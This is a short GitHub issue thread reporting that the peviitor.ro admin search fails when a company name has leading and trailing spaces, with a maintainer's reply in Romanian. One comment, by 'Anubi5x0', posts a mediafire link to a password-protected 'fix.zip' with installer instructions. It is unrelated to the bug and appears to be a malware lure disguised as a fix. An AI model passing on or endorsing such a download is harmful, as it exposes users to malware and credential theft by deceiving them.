### ISSUE TITLE
TC Test Search with both Leading and Trailing Spaces #273

### ISSUE THREAD

**Issue by RoxanaDanalache** [peviitor-ro/validator-ui#285]
ENVIRONMENT:
URL: https://admin.peviitor.ro/
Browser: Chrome
Device: PC
OS: Windows 10

STEPS TO REPRODUCE:
Enter URL "https://admin.peviitor.ro/" in to the browser
Press ENTER Main page opens
Press space before and after the company name in the search bar.
Expected result: The company name should appear
Actual result: No results found

![image](https://github.com/user-attachments/assets/4c4703a0-d618-4334-b299-11a74a65bd9d)

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lalalaurentiu** [comment]
Am reprodus bugul tău și nu am nici o problemă. Asigură-te ca ai acces la firma respectiva ...
